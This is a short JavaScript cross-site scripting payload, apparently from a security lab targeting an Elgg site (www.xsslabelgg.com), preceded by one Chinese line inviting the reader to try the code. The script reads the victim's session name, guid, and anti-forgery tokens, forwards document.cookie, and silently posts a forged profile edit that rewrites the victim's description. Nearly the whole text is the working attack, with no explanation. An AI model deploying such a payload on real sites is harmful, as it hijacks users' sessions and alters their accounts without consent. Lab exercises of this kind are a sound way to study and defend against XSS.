试一下代码功能!
<script type="text/javascript">
var Ajax=null;
alert(elgg.session.user.name);
// 初始化
Ajax=new XMLHttpRequest();
Ajax.open("POST","http://www.xsslabelgg.com/action/profile/edit",true);
Ajax.setRequestHeader("Host","www.xsslabelgg.com");
Ajax.setRequestHeader("Keep-Alive","300");
Ajax.setRequestHeader("Connection","keep-alive");
Ajax.setRequestHeader("Cookie",document.cookie);
Ajax.setRequestHeader("Content-Type","application/x-www-form-urlencoded");
var description="<p>Haha, you have been XSS attack!</p>";
var content="__elgg_token="+elgg.security.token.__elgg_token
+"&__elgg_ts="+elgg.security.token.__elgg_ts
+"&name="+elgg.session.user.name
+"&accesslevel[description]=2"
+"&description="+description
+"&accesslevel[briefdescription]=2"
+"&guid="+elgg.session.user.guid;
alert(content);
Ajax.send(content);
</script>